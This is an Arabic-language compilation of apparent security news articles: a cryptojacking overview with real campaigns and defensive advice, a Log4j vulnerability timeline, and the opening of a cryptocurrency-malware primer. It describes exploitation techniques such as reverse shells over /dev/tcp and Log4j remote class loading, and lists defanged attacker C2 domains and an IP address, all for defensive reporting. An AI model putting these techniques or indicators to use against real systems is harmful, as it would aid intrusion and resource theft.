يسعى المهاجمون إلى زيادة ربحية التعدين الخفي من خلال توسيع آفاقهم لتشمل الخوادم، وأجهزة الشبكة، وحتى أجهزة إنترنت الأشياء (IoT). الخوادم، على سبيل المثال، هي هدف مغرٍ بشكل خاص لأنها عادةً ما تكون أقوى من جهاز الكمبيوتر المكتبي العادي. كما أنها أرض صيد رئيسية في عام 2022 حيث يقوم الأشرار بمسح الخوادم المكشوفة على الإنترنت العام التي تحتوي على ثغرات مثل Log4J، مستغلين الخلل ويقومون بتحميل برامج تعدين العملات الرقمية بهدوء على النظام المتصل بخوادم المخترق. غالبًا ما يستخدم المهاجمون النظام المخترق في البداية لنقل التعدين الخفي بشكل جانبي (laterally) إلى أجهزة شبكية أخرى.

“نحن نشهد ارتفاعًا في التعدين الخفي الناتج عن ثغرة Log4J،” كما تقول سالي فينسنت، مهندسة أبحاث التهديدات الكبيرة في LogRhythm. “يخترق القراصنة الشبكات ويقومون بتثبيت برامج ضارة تستخدم التخزين لتعدين العملات الرقمية.”

### **هجمات سلسلة توريد البرمجيات (Software supply chain attacks)**

يستهدف مجرمو الإنترنت سلسلة توريد البرمجيات عن طريق زرع مستودعات أكواد مفتوحة المصدر بحزم ومكتبات ضارة تحتوي على سكربتات تعدين خفي مضمنة داخل كودها. مع قيام المطورين بتنزيل هذه الحزم بالملايين حول العالم، يمكن لهذه الهجمات أن توسع نطاق البنية التحتية للتعدين الخفي بسرعة لصالح الأشرار بطريقتين. يمكن استخدام الحزم الضارة لاستهداف أنظمة المطورين — والشبكات والموارد السحابية التي يتصلون بها — لاستخدامها مباشرة كموارد تعدين خفي غير مشروعة. أو يمكنهم الاستفادة من هذه الهجمات لتسميم البرامج التي يبنيها هؤلاء المطورون بمكونات تنفذ سكربتات تعدين العملات الرقمية على أجهزة المستخدم النهائي للتطبيق.

### **الاستفادة من البنية التحتية السحابية**

تستفيد العديد من مؤسسات التعدين الخفي من قابلية التوسع للموارد السحابية عن طريق اختراق البنية التحتية السحابية والاستفادة من مجموعة أوسع من مجمعات الحوسبة لتشغيل نشاط التعدين الخاص بهم. دراسة أجراها فريق عمل الأمن السيبراني في Google في خريف العام الماضي أفادت بأن 86% من الحالات السحابية المخترقة تُستخدم لتعدين العملات الرقمية.

“اليوم، يستهدف المهاجمون الخدمات السحابية بكل الوسائل لتعدين المزيد والمزيد من العملات الرقمية، حيث يمكن للخدمات السحابية أن تسمح لهم بتشغيل حساباتهم على نطاق أوسع من مجرد جهاز محلي واحد، سواء كانوا يستولون على بيئة سحابية مُدارة لمستخدم أو حتى يساءون استخدام تطبيقات SaaS لتنفيذ حساباتهم،” كتب جاي أرازي، باحث الأمن الكبير في Palo Alto Networks، في منشور مدونة.

إحدى الطرق الشائعة للقيام بذلك هي مسح واجهات برمجة التطبيقات (APIs) للحاويات المكشوفة أو دلاء التخزين السحابية غير الآمنة واستخدام هذا الوصول لبدء تحميل برامج تعدين العملات الرقمية على حالات الحاويات أو الخوادم السحابية المتأثرة. يكون الهجوم عادةً آليًا باستخدام برنامج مسح يبحث عن خوادم يمكن الوصول إليها عبر الإنترنت العام مع واجهات برمجة تطبيقات مكشوفة أو إمكانية وصول غير مصادق عليها. يستخدم المهاجمون بشكل عام سكربتات لإسقاط حمولات المُعدّن على النظام الأولي والبحث عن طرق للانتشار عبر الأنظمة السحابية المتصلة.

“إن ربحية وسهولة تنفيذ التعدين الخفي على نطاق واسع يجعل هذا النوع من الهجمات فريسة سهلة،” قال مات موير، باحث الأمن في Cado Security، في منشور مدونة موضحًا أن الهجمات القائمة على السحابة مربحة بشكل خاص. “من المحتمل أن يستمر هذا طالما استمر المستخدمون في كشف الخدمات مثل Docker وRedis للشبكات غير الموثوقة.”

## لماذا يحظى التعدين الخفي بشعبية

وفقًا لتقرير من ReasonLabs، في العام الماضي، كانت 58.4% من جميع أحصنة طروادة (Trojans) المكتشفة عبارة عن مُعدّنات عملات رقمية للتعدين الخفي. في الوقت نفسه، وجدت دراسة أخرى من SonicWall أن عام 2021 كان أسوأ عام حتى الآن لهجمات التعدين الخفي، حيث سجلت الفئة 97.1 مليون هجوم على مدار العام. هذه الأرقام قوية جدًا لأن التعدين الخفي هو في الأساس سك النقود لمجرمي الإنترنت.

عندما يتمكن المحتال من تعدين العملات الرقمية على مجموعة غير محدودة على ما يبدو من موارد الحوسبة المجانية من أجهزة الضحايا، فإن الإمكانات الإيجابية (upside) بالنسبة لهم هائلة. حتى مع الانخفاض الحاد في تقييم Bitcoin في هذا الربيع الذي أوصله إلى ما دون مستوى 30,000 دولار، فإن هوامش أرباح المُعدّنين الخفيين غير المشروعة لا تزال منطقية من الناحية التجارية حيث أن قيمة ما يقومون بتعدينه تفوق بكثير تكاليف بنيتهم التحتية الإجرامية.

## أمثلة واقعية على التعدين الخفي

### **WatchDog يستهدف نقاط نهاية Docker Engine API وخوادم Redis**

مصيدة عسل (honeypot) من فريق البحث الأمني في Cado Labs اكتشفت هجوم تعدين خفي متعدد المراحل يستهدف نقاط نهاية Docker Engine API وخوادم Redis المكشوفة، ويمكنه الانتشار بطريقة تشبه الدودة. يتم تنفيذ الهجوم من قبل مجموعة الهجوم WatchDog، والتي كانت نشطة بشكل خاص في أواخر عام 2021 وعام 2022 من خلال العديد من حملات التعدين الخفي.

### **حالات Alibaba ECS في مرمى تعدين العملات الرقمية**

كانت TeamTNT واحدة من أولى مجموعات القرصنة التي حولت تركيز التعدين الخفي بشكل كبير نحو الخدمات الموجهة للسحابة. أفاد باحثون في TrendMicro في أواخر عام 2021 أن هذه المجموعة، جنبًا إلى جنب مع منافسين مثل عصابة Kinsig، كانت تقوم بحملات تعدين خفي تقوم بتثبيت مُعدّنات في حالات Alibaba Elastic Computing Service (ECS) وتعطيل ميزات الأمن لتجنب الكشف. 

### **بوتات المُعدّن والباب الخلفي يستخدمون Log4J لمهاجمة خوادم VMware Horizon**

كانت ثغرة Log4Shell نعمة لمهاجمي التعدين الخفي في عام 2022. في أحد الأمثلة البارزة، وجد باحثو Sophos في وقت سابق من هذا العام أن ‘حشدًا’ من المهاجمين كانوا يستهدفون خوادم VMware Horizon لتسليم مجموعة من حمولات التعدين الخفي التي تضمنت z0Miner، ومُعدّن JavaX ولاثنين على الأقل من متغيرات XMRig، وهما Jin وMimu بوتات تعدين العملات الرقمية.

### **هجمات سلسلة التوريد عبر مكتبات npm**

أطلق خبراء أمن سلسلة توريد البرمجيات في Sonatype في خريف عام 2021 ناقوس الخطر بشأن حزم تعدين العملات الرقمية الخبيثة المختبئة في npm، مستودع حزم JavaScript المستخدم من قبل المطورين في جميع أنحاء العالم. في ذلك الوقت، وجد مجموعة من ثلاث حزم، واحدة منها على الأقل كانت تنتحل شخصية مكتبة شرعية شائعة يستخدمها المطورون تُسمى “ua-parser-js”، والتي تحصل على أكثر من 7 ملايين تنزيل أسبوعي وستكون طريقة مثالية لجذب المطورين لتنزيل جزء من كود ضار بالخطأ وتثبيته في برامجهم.

بعد بضعة أشهر من ذلك التقرير، أصدر باحثو WhiteSource (المعروفين الآن باسم Mend) تقريرًا إضافيًا أظهر أن npm يزخر بالكود الضار—ما يصل إلى 1,300 حزمة ضارة تتضمن التعدين الخفي وسلوكيات ضارة أخرى.

### **مهاجمون رومانيون يستهدفون أجهزة Linux ببرامج تعدين العملات الرقمية الضارة**

في الصيف الماضي، اكتشفت Bitdefender مجموعة تهديد رومانية كانت تستهدف الأنظمة القائمة على Linux باستخدام بيانات اعتماد SSH لنشر برمجيات تعدين Monero الخبيثة. كانت الأدوات التي استخدموها موزعة بنموذج خدمة. كانت هذه الحالة على رأس ما يبدو أنه اتجاه متزايد لهجمات تعدين العملات المشفرة على أنظمة Linux. تقرير صدر في وقت سابق من هذا العام من VMware فصّل الاستهداف المتزايد لبيئات متعددة السحابة القائمة على Linux، ولا سيما باستخدام برمجيات التعدين XMRig.

"العديد من عينات تعدين العملات المشفرة من أنظمة Linux لها علاقة ما بتطبيق XMRig"، أوضح التقرير، الذي أظهر أن 89٪ من هجمات تعدين العملات المشفرة استخدمت مكتبات مرتبطة بـ XMRig. "لذلك، عندما يتم تحديد مكتبات ووحدات XMRig محددة في برامج Linux الثنائية، فمن المحتمل أن يكون ذلك دليلاً على سلوك تعدين عملات مشفرة محتمل".

### **CoinStomp تستخدم تكتيكات مراوغة متطورة**

CoinStop هي حملة تعدين خبيثة أخرى تم اكتشافها مؤخرًا تستهدف مزودي الخدمات السحابية الآسيويين. تميزت هذه الحملة بإجراءاتها لمكافحة الأدلة الجنائية والمراوغة. تضمنت هذه الإجراءات التلاعب بطوابع الوقت لتغيير الطوابع الزمنية للنظام، وإزالة السياسات المشفرة للنظام، واستخدام ملف الجهاز /dev/tcp لإنشاء جلسة قشرة عكسية، كما أوضح Muir من Cado في تقرير عن الهجوم.

### **مزرعة عملات مشفرة تم العثور عليها في مستودع**

قد يذهب المخترقون أحيانًا إلى أبعد الحدود لسرقة ليس فقط قوة المعالجة ولكن أيضًا موارد الطاقة والشبكة من البنية التحتية للشركات. في العام الماضي، سلط محللون من Darktrace الضوء على مثال مجهول من أحد عملائهم حيث اكتشفوا مزرعة تعدين عملات مشفرة في مستودع كانت مخبأة داخل مجموعة غير واضحة من الصناديق الكرتونية. في الداخل، كان هناك جهاز تعدين سري يدير وحدات معالجة رسوميات متعددة كانت موصولة بقدرة شبكة الشركة.

## كيفية منع التعدين الخبيث

مع تطوره إلى هجوم متعدد النواقل يمتد عبر موارد النقاط الطرفية والخوادم والسحابة، تتطلب الوقاية من التعدين الخبيث استراتيجية دفاعية منسقة وشاملة. يمكن أن تساعد الخطوات التالية في منع انتشار التعدين الخبيث في موارد المؤسسة.

**استخدام حماية قوية للنقاط الطرفية:** أساس ذلك هو استخدام حماية النقاط الطرفية ومكافحة البرامج الضارة القادرة على اكتشاف أدوات التعدين، بالإضافة إلى تحديث مرشحات الويب وإدارة ملحقات المتصفح لتقليل مخاطر تنفيذ البرامج النصية من المتصفح. يجب على المؤسسات البحث عن منصات حماية نقاط طرفية يمكنها التوسع لتشمل الخوادم وما بعدها.

**تصحيح وتحصين الخوادم (وكل شيء آخر).** يميل المخترقون إلى البحث عن الثمار الأسهل التي يمكنهم حصادها بهدوء - بما في ذلك مسح الخوادم المكشوفة للعامة التي تحتوي على ثغرات أقدم. يمكن أن يقطع التحصين الأساسي للخوادم الذي يتضمن التصحيح، وإيقاف الخدمات غير المستخدمة، وتحديد البصمة الخارجية شوطاً طويلاً نحو تقليل مخاطر الهجمات القائمة على الخوادم.

**استخدام تحليل تكوين البرمجيات.** توفر أدوات تحليل تكوين البرمجيات رؤية أفضل للمكونات المستخدمة داخل البرمجيات لمنع هجمات سلسلة التوريد التي تستفيد من نصوص التعدين الخبيثة.

**اصطياد التكوينات الخاطئة في السحابة.** واحدة من أكثر الطرق تأثيرًا التي يمكن للمؤسسات من خلالها إيقاف التعدين الخبيث في السحابة هي تشديد تكوينات السحابة والحاويات. وهذا يعني العثور على خدمات سحابية مكشوفة للإنترنت العام دون مصادقة مناسبة، واستئصال خوادم API المكشوفة، وإزالة بيانات الاعتماد والأسرار الأخرى المخزنة في بيئات المطورين والمضمنة في التطبيقات.

## **كيفية اكتشاف التعدين الخبيث**

التعدين الخبيث هو هجوم إلكتروني كلاسيكي بطيء ومنخفض مصمم لترك آثار قليلة خلفه لتجنب الكشف طويل الأمد. بينما قطعت منصات حماية النقاط الطرفية وتقنيات الكشف والاستجابة للنقاط الطرفية شوطًا طويلاً في التنبيه بهجمات التعدين الخبيث، فإن الأشرار بارعون في المراوغة على هذه الجبهة ولا يزال اكتشاف أدوات التعدين غير المشروعة صعبًا، خاصة عندما يتم اختراق عدد قليل فقط من الأنظمة. فيما يلي بعض الطرق الإضافية للإشارة إلى علامات التعدين الخبيث.

**تدريب فريق مكتب المساعدة على البحث عن علامات التعدين.** أحيانًا يكون أول مؤشر على نقاط المستخدم الطرفية هو زيادة شكاوى مكتب المساعدة حول بطء أداء الحاسوب. يجب أن يثير ذلك علامة حمراء للتحقيق بشكل أعمق، بالإضافة إلى ارتفاع حرارة الأجهزة أو ضعف أداء البطارية في الأجهزة المحمولة.

**نشر حل لمراقبة الشبكة.** يمكن لأدوات مراقبة الشبكة أن تقدم أداة قوية في التقاط أنواع حركة المرور على الويب وحركة مرور القيادة والتحكم الصادرة التي تشير إلى نشاط تعدين خبيث، بغض النظر عن الجهاز الذي تأتي منه.

"إذا كان لديك ترشيح جيد للبيانات الصادرة على خادم حيث تراقب بداية الاتصالات الصادرة، فيمكن أن يكون ذلك اكتشافًا جيدًا [للبرامج الضارة لتعدين العملات المشفرة]"، كما يقول ترافيس فارال، نائب الرئيس ومدير أمن المعلومات في Archaea Energy. يحذر، مع ذلك، من أن مؤلفي أدوات التعدين يمكنهم كتابة برامجهم الضارة لتجنب طريقة الكشف هذه.

**استخدام مراقبة السحابة وأمان وقت تشغيل الحاويات.** يمكن لأدوات متطورة مثل مراقبة السحابة وفحص أمان وقت تشغيل الحاويات أن توفر رؤية إضافية في البيئات السحابية التي قد تتأثر بأدوات تعدين غير مصرح بها. يدمج مزودو الخدمات السحابية هذا النوع من الرؤية في خدماتهم، أحيانًا كإضافات. على سبيل المثال، وسعت Google Cloud مركز الأمان الخاص بها في وقت سابق من هذا العام ليشمل ما تسميه كشف التهديدات على الأجهزة الافتراضية لالتقاط علامات التعدين في السحابة، من بين تهديدات سحابية أخرى.

**المشاركة في مطاردات التهديد المنتظمة.** نظرًا لأن العديد من هجمات التعدين الخبيث تكون خفية وتترك آثارًا قليلة، فقد تحتاج المؤسسات إلى اتخاذ إجراءات أكثر نشاطًا مثل مطاردة التهديدات للبحث بانتظام عن علامات خفية للاختراق ومتابعة التحقيقات.

"يجب على فرق أمن النقاط الطرفية ومركز عمليات الأمن استثمار الوقت في التمارين النشطة ومطاردات التهديد بدلاً من الانتظار حتى يحدث شيء قد يكون كارثيًا"، كما يقول فنسنت من LogRhythm.

**مراقبة مواقع الويب الخاصة بك بحثًا عن أكواد التعدين**. يحذر فارال من أن المخترقين يجدون طرقًا لوضع أجزاء من كود Javascript على خوادم الويب. "الخادم نفسه ليس الهدف، ولكن أي شخص يزور الموقع نفسه [معرض لخطر الإصابة]"، كما يقول. يوصي بالمراقبة المنتظمة لتغييرات الملفات على خادم الويب أو التغييرات في الصفحات نفسها.

## **كيفية الاستجابة لهجوم تعدين خبيث**

بعد اكتشاف نشاط تعدين غير مشروع، يجب أن تتبع الاستجابة لهجوم تعدين خبيث الخطوات القياسية للاستجابة للحوادث الإلكترونية التي تشمل الاحتواء، والاستئصال، والاسترداد، والدروس المستفادة. تتضمن بعض النصائح حول كيفية الاستجابة لهجوم تعدين خبيث ما يلي:

**قتل البرامج النصية المنفذة عبر الويب.** بالنسبة لهجمات JavaScript داخل المتصفح، يكون الحل بسيطًا بمجرد اكتشاف التعدين: قم بقتل علامة التبويب في المتصفح التي تشغل البرنامج النصي. يجب على قسم تقنية المعلومات ملاحظة عنوان URL للموقع الإلكتروني الذي هو مصدر البرنامج النصي وتحديث مرشحات الويب الخاصة بالشركة لحظره.

**إيقاف تشغيل مثيلات الحاويات المخترقة.** يمكن أيضًا التعامل مع البنية التحتية السحابية غير القابلة للتغيير مثل مثيلات الحاويات المخترقة بأدوات التعدين ببساطة، عن طريق إيقاف تشغيل مثيلات الحاويات المصابة والبدء من جديد. ومع ذلك، يجب على المؤسسات التعمق في الأسباب الجذرية التي أدت إلى اختراق الحاوية في المقام الأول. وهذا يعني البحث عن علامات تشير إلى تعرض لوحة تحكم الحاوية وبيانات الاعتماد للاختراق وفحص موارد السحابة المتصلة بحثًا عن علامات الاختراق. تتمثل إحدى الخطوات الرئيسية في التأكد من أن صورة الحاوية الجديدة التي ستحل محل القديمة ليست مهيأة بشكل مماثل.

**تقليل الأذونات وإعادة إنشاء مفاتيح API.** سيتطلب استئصال التعدين الخبيث القائم على السحابة والتعافي الكامل منه من المؤسسات تقليل الأذونات للموارد السحابية المتأثرة (وتلك المتصلة بها) وإعادة إنشاء مفاتيح API لمنع المهاجمين من العودة مباشرة إلى نفس البيئة السحابية.

**التعلم والتكيف.** استخدم التجربة لفهم أفضل لكيفية تمكن المهاجم من اختراق أنظمتك. قم بتحديث تدريب المستخدمين ومكتب المساعدة وتقنية المعلومات ومحللي مركز عمليات الأمن ليكونوا أفضل قدرة على تحديد محاولات التعدين الخبيث والاستجابة وفقًا لذلك.

_ملاحظة المحرر: تم تحديث هذه المقالة، التي نُشرت أصلاً في فبراير 2018، لتشمل أبحاثًا جديدة وأفضل الممارسات وأمثلة على التعدين الخبيث._

* * *

# ثغرات Apache Log4j: جدول زمني

### أثرت ثغرة Apache Log4j على المؤسسات حول العالم. إليك جدول زمني للأحداث الرئيسية المحيطة باستغلال Log4j كما حدثت.

لقد تصدرت ثغرة Apache Log4j عناوين الأخبار العالمية منذ اكتشافها في أوائل ديسمبر. أثرت الثغرة على أعداد هائلة من المؤسسات حول العالم بينما تسابقت فرق الأمن لتخفيف المخاطر المرتبطة بها. إليك جدول زمني للأحداث الرئيسية المحيطة بثغرة Log4j كما حدثت.

## **الخميس، 9 ديسمبر: اكتشاف استغلال اليوم الصفري لـ Apache Log4j**

أصدرت Apache تفاصيل حول ثغرة حرجة في Log4j، وهي مكتبة تسجيل مستخدمة في ملايين التطبيقات القائمة على Java. بدأ المهاجمون في استغلال الثغرة (CVE-2021-44228) – الملقبة بـ "Log4Shell"، والتي حصلت على تصنيف 10 من 10 على مقياس تصنيف الثغرات CVSS. يمكن أن تؤدي إلى تنفيذ كود عن بعد (RCE) على الخوادم الأساسية التي تشغل التطبيقات المعرضة للخطر. "يمكن للمهاجم الذي يمكنه التحكم في رسائل السجل أو معلمات رسائل السجل تنفيذ كود عشوائي يتم تحميله من خوادم LDAP عند تمكين استبدال بحث الرسالة"، كتب مطورو Apache في تحذير. تم توفير إصلاح للمشكلة مع إصدار Log4j 2.15.0 بينما عملت فرق الأمن من جميع أنحاء العالم لحماية مؤسساتهم. تم حث الشركات على تثبيت أحدث إصدار.

## **الجمعة، 10 ديسمبر: المركز الوطني للأمن السيبراني البريطاني يصدر تحذير Log4j للمؤسسات البريطانية**

مع استمرار تداعيات الثغرة، أصدر المركز الوطني للأمن السيبراني في المملكة المتحدة تحذيرًا عامًا للشركات البريطانية حول الثغرة وحدد استراتيجيات التخفيف. نصح المركز الوطني للأمن السيبراني جميع المؤسسات بتثبيت أحدث تحديث فورًا أينما كان معروفًا استخدام Log4j. "يجب أن تكون هذه الأولوية الأولى لجميع المؤسسات البريطانية التي تستخدم برمجيات معروفة بأنها تتضمن Log4j. يجب على المؤسسات تحديث كل من البرمجيات المواجهة للإنترنت وغير المواجهة للإنترنت"، كما جاء في البيان. تم أيضًا حث الشركات على البحث عن مثيلات غير معروفة لـ Log4j ونشر مراقبة/حظر شبكي وقائي.

## **السبت، 11 ديسمبر: مديرة CISA تعلق على "تحدي عاجل للمدافعين عن الشبكات"**

كما فعل المركز الوطني للأمن السيبراني في المملكة المتحدة، استجابت وكالة الأمن السيبراني وأمن البنية التحتية الأمريكية (CISA) علنًا لثغرة Log4j حيث علقت المديرة جين إيسترلي على التحدي العاجل الذي تمثله للمدافعين عن الشبكات. "تعمل CISA بشكل وثيق مع شركائنا في القطاعين العام والخاص لمعالجة استباقية لثغرة حرجة تؤثر على المنتجات التي تحتوي على مكتبة برمجيات Log4j"، قالت في بيان. "نتخذ إجراءات عاجلة لدفع التخفيف من هذه الثغرة واكتشاف أي نشاط تهديد مرتبط بها. أضفنا هذه الثغرة إلى كتالوج الثغرات المستغلة المعروفة لدينا، مما يلزم الوكالات الفيدرالية المدنية - ويشير للشركاء غير الفيدراليين - بتصحيح أو معالجة هذه الثغرة بشكل عاجل. نتواصل بشكل استباقي مع الكيانات التي قد تكون شبكاتها معرضة للخطر ونستفيد من أدوات الفحص وكشف الاختراق لدينا لمساعدة شركاء الحكومة والصناعة على تحديد التعرض للثغرة أو استغلالها."

أوصت CISA مالكي الأصول باتخاذ ثلاث خطوات إضافية وفورية للمساعدة في تخفيف الثغرة:

  * تعداد أي أجهزة مواجهة خارجية تحتوي على Log4j مثبتًا
  * ضمان أن مراكز عمليات الأمن تتعامل مع كل تنبيه على الأجهزة التي تندرج ضمن الفئة المذكورة أعلاه
  * تثبيت جدار حماية لتطبيقات الويب مع قواعد يتم تحديثها تلقائيًا حتى تتمكن مراكز عمليات الأمن من التركيز على تنبيهات أقل



## **الثلاثاء، 14 ديسمبر: اكتشاف ثغرة ثانية في Log4j تحمل تهديد رفض الخدمة، إصدار تصحيح جديد**

تم اكتشاف ثغرة ثانية تؤثر على Apache Log4j. سمح الاستغلال الجديد، CVE 2021-45046، للممثلين الخبيثين بصياغة بيانات إدخال خبيثة باستخدام نمط بحث JNDI لإنشاء هجمات رفض الخدمة (DoS)، وفقًا لـ وصف CVE. تم توفير تصحيح جديد للاستغلال أزال الدعم لأنماط بحث الرسائل وعطل وظيفة JNDI افتراضيًا، حيث كان إصلاح Log4j 2.15.0 للثغرة الأصلية غير مكتمل في بعض التكوينات غير الافتراضية.

"بينما تكون CVE-2021-45046 أقل شدة من الثغرة الأصلية، فإنها تصبح ناقلًا آخر للمهاجمين لشن هجمات خبيثة ضد الأنظمة غير المصححة أو المصححة بشكل غير صحيح"، قالت آمي تشانغ، رئيسة قسم المخاطر والاستجابة في Resilience، لـ CSO بعد وقت قصير من اكتشاف الثغرة. "يمكن استغلال التصحيح غير المكتمل لـ CVE-2021-44228 لصياغة بيانات إدخال خبيثة، مما قد يؤدي إلى هجوم رفض الخدمة. يمكن لهجوم رفض الخدمة إيقاف تشغيل جهاز أو شبكة وجعله غير قابل للوصول للمستخدمين المقصودين"، أضافت. نُصحت المؤسسات بالتحديث إلى Log4j: 2.16.0 في أقرب وقت ممكن.

## **الجمعة، 17 ديسمبر: الكشف عن ثغرة ثالثة في Log4j، إتاحة إصلاح جديد**

نشرت Apache تفاصيل ثغرة رئيسية ثالثة في Log4j وأتاحت إصلاحًا آخر. كانت هذه ثغرة تكرار لا نهائي مصنفة 7.5 من 10. "تم إبلاغ فريق Log4j بوجود ثغرة أمنية، CVE-2021-45105، التي تمت معالجتها في Log4j 2.17.0 لجافا 8 والإصدارات الأحدث،" كما كتبت. "إصدارات Apache Log4j2 2.0-alpha1 حتى 2.16.0 لم تحمي من التكرار غير المنضبط الناتج عن عمليات البحث الذاتية المرجعية. عندما يستخدم تكوين التسجيل تخطيط نمط غير افتراضي مع بحث سياق (على سبيل المثال، $${ctx:loginId})، يمكن للمهاجمين الذين لديهم سيطرة على بيانات إدخال خريطة سياق الخيط (MDC) صياغة بيانات إدخال خبيثة تحتوي على بحث متكرر، مما يؤدي إلى خطأ تجاوز سعة الرصة (StackOverflowError) الذي سينهي العملية. يُعرف هذا أيضًا بهجوم رفض الخدمة."

حددت Apache أيضًا التخفيفات التالية:

  * في PatternLayout في تكوين التسجيل، استبدل عمليات بحث السياق مثل ${ctx:loginId} أو $${ctx:loginId} بأنماط خريطة سياق الخيط (%X, %mdc, أو %MDC)
  * وإلا، في التكوين، قم بإزالة المراجع إلى عمليات بحث السياق مثل ${ctx:loginId} أو $${ctx:loginId} حيثما تنشأ من مصادر خارجية عن التطبيق مثل رؤوس HTTP أو إدخال المستخدم



## **الإثنين، 20 ديسمبر: استغلال Log4j لتثبيت Dridex و Meterpreter**

حذرت مجموعة أبحاث الأمن السيبراني Cryptolaemus من أن ثغرة Log4j يتم استغلالها لإصابة أجهزة Windows بحصان Dridex المصرفي وأجهزة Linux بـ Meterpreter. Dridex هو شكل من أشكال البرامج الضارة التي تسرق بيانات اعتماد البنك عبر نظام يستخدم وحدات ماكرو من Microsoft Word، بينما Meterpreter هو حمولة هجوم Metasploit توفر غلافًا تفاعليًا يمكن للمهاجم من خلاله استكشاف الجهاز المستهدف وتنفيذ الكود. أخبر جوزيف روزن، عضو Cryptolaemus، BleepingComputer أن المهاجمين يستخدمون متغير استغلال Log4j RMI (استدعاء الطريقة عن بعد) لإجبار الأجهزة المعرضة للخطر على تحميل وتنفيذ فئة Java من خادم بعيد يتحكم فيه المهاجم.

## **الأربعاء، 22 ديسمبر: بيانات تظهر أن 10٪ من جميع الأصول معرضة لـ Log4Shell**

كشفت بيانات صادرة عن بائع الأمن السيبراني Tenable أن واحدًا من كل عشرة أصول كان معرضًا لـ Log4Shell، بينما لم تبدأ 30٪ من المؤسسات في فحص الثغرة. "من بين الأصول التي تم تقييمها، تم العثور على Log4Shell في حوالي 10٪ منها، بما في ذلك مجموعة واسعة من الخوادم وتطبيقات الويب والحاويات وأجهزة إنترنت الأشياء"، جاء في منشور مدونة Tenable. "Log4Shell منتشر في جميع الصناعات والمناطق الجغرافية. واحد من كل عشرة خوادم مؤسسية مكشوف. واحد من كل عشرة تطبيقات ويب وهكذا. واحد من كل عشرة تقريبًا من كل جانب من جوانب بنيتنا التحتية الرقمية لديه احتمال للاستغلال الخبيث عبر Log4Shell."

حذر البائع من أن Log4Shell يحمل تهديدًا أكبر من EternalBlue (المستغل في هجمات WannaCry) بسبب انتشار Log4j عبر كل من البنية التحتية والتطبيقات. "لم تنادِ أي ثغرة واحدة في التاريخ بصراحة للمعالجة مثل هذه. ستحدد Log4Shell الحوسبة كما نعرفها، مفصولة بين أولئك الذين بذلوا الجهد لحماية أنفسهم وأولئك الذين يشعرون بالراحة في الإهمال"، أضاف.

## **الثلاثاء، 4 يناير: FTC تخبر الشركات بتصحيح ثغرة Log4j، تهدد باتخاذ إجراءات قانونية**

حثت لجنة التجارة الفيدرالية (FTC) المؤسسات الأمريكية على تصحيح ثغرة Log4Shell فورًا أو المخاطرة بمواجهة إجراءات عقابية من الوكالة. "عندما يتم اكتشاف الثغرات واستغلالها، فإن ذلك يعرض المعلومات الشخصية للخطر أو الاختراق، وخسارة مالية، وأضرار أخرى لا رجعة فيها. إن واجب اتخاذ خطوات معقولة للتخفيف من الثغرات البرمجية المعروفة يستدعي قوانين تشمل، من بين أمور أخرى، قانون لجنة التجارة الفيدرالية وقانون Gramm Leach Bliley،" كما قالت FTC. وأضافت أنه من الضروري أن تتصرف الشركات وموردوها الذين يعتمدون على Log4j الآن لتقليل احتمالية الضرر للمستهلكين وتجنب الإجراءات القانونية من FTC. "تعتزم FTC استخدام سلطتها القانونية الكاملة لمقاضاة الشركات التي تفشل في اتخاذ خطوات معقولة لحماية بيانات المستهلكين من التعرض نتيجة لـ Log4j، أو ثغرات مماثلة معروفة في المستقبل."

## **الإثنين، 10 يناير: مايكروسوفت تحذر من مشغل برمجية فدية صيني يستغل Log4Shell**

قامت مايكروسوفت بتحديث صفحة توجيهات ثغرة Log4j بتفاصيل عن مشغل برمجية فدية صيني (DEV-0401) يستهدف الأنظمة الموجهة للإنترنت وينشر برمجية الفدية NightSky. "ابتداءً من 4 يناير، بدأ المهاجمون استغلال ثغرة CVE-2021-44228 في الأنظمة الموجهة للإنترنت التي تعمل بنظام VMware Horizon"، كما كتبت. "سبق لـ DEV-0401 نشر عائلات متعددة من برمجيات الفدية بما في ذلك LockFile وAtomSilo وRook، واستغل بالمثل الأنظمة الموجهة للإنترنت التي تعمل بنظام Confluence (CVE-2021-26084) وخوادم Exchange المحلية (CVE-2021-34473)." بناءً على تحليل مايكروسوفت، تم اكتشاف المهاجمين وهم يستخدمون خوادم تحكم وأوامر (CnC) تنتحل نطاقات شرعية. وتشمل هذه service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.

* * *

أساسيات الأمن: تأثير برمجيات تعدين العملات الرقمية الخبيثة

قامت الحكومة الأسترالية للتو باعتراف بالعملة الرقمية كوسيلة دفع قانونية. منذ 1 يوليو، أصبحت المشتريات التي تتم باستخدام العملات الرقمية مثل البيتكوين معفاة من ضريبة السلع والخدمات في البلاد لتجنب الازدواج الضريبي. وبالتالي، لن يتم فرض ضرائب على المتداولين والمستثمرين عند شرائهم وبيعهم عبر منصات التبادل القانونية.

اليابان، التي شرّعت البيتكوين كوسيلة دفع في أبريل الماضي، تتوقع أكثر من 20,000 تاجر لقبول مدفوعات البيتكوين. دول أخرى تنضم إلى هذا الركب، ولو جزئيًا: الشركات وبعض المؤسسات العامة في سويسرا، والنرويج، وهولندا. في دراسة حديثة، يقدر عدد المستخدمين النشطين الفريدين لمحافظ العملات الرقمية بين 2.9 و5.8 مليون، معظمهم في أمريكا الشمالية وأوروبا.

ولكن ما علاقة قبول واعتماد العملات الرقمية بالتهديدات عبر الإنترنت؟ الكثير في الواقع. مع اكتساب العملات الرقمية مثل البيتكوين زخمًا في العالم الحقيقي، ستزداد التهديدات الإجرامية الإلكترونية التي تسيء استخدامها. لكن كيف بالضبط؟ وماذا يعني هذا للشركات والمستخدمين العاديين؟

## ما هي العملة الرقمية؟

العملة الرقمية هي سلسلة بيانات مشفرة تشير إلى وحدة عملة. يتم مراقبتها وتنظيمها بواسطة شبكة ند لند تُعرف أيضًا باسم سلسلة الكتل (blockchain)، والتي تعمل أيضًا كدفتر حسابات آمن للمعاملات، مثل الشراء والبيع والتحويل. على عكس النقود المادية، العملات الرقمية لا مركزية، مما يعني أنها لا تصدر عن الحكومات أو المؤسسات المالية الأخرى.

يتم إنشاء العملات الرقمية (وتأمينها) من خلال خوارزميات تشفير يتم صيانتها والتحقق منها في عملية تسمى التعدين، حيث تقوم شبكة من أجهزة الكمبيوتر أو أجهزة متخصصة مثل الدوائر المتكاملة الخاصة بالتطبيقات (ASICs) بمعالجة المعاملات والتحقق من صحتها. تحفز العملية القائمين بالتعدين الذين يديرون الشبكة بالعملة الرقمية.

